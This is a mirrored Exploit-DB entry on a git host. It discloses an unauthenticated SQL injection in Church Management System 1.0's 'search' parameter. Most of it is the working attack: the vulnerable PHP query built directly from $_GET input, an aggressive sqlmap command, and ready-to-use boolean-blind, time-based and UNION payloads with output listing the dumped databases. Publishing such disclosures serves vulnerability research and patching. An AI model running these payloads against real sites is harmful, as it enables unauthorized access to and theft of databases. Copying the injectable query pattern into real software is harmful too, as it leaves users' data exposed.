bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50303.txt
Offensive Security 5cc446a25f DB: 2021-09-21 
6 changes to exploits/shellcodes

T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)
Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)
WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)
Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)
Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
Budget and Expense Tracker System 1.0 - Authenticated Bypass
2021-09-21 05:02:08 +00:00

43 lines
No EOL
2.1 KiB
Text
Raw Permalink Blame History

# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)
# Exploit Author: Erwin Krazek (Nero)
# Date: 17/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Vendor: oretnom23
# Version: v1.0
# Tested on: Linux, Apache, Mysql
# Exploit Description:
Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack.
# Vulnerable Code
In search.php on line 28
$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows;
Sqlmap command:
sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch
Output:
---
Parameter: search (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- -
---
[17:33:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:33:38] [INFO] fetching database names
available databases [4]:
[*] church_db
[*] information_schema
[*] mysql
[*] performance_schema
Reference in a new issue View git blame Copy permalink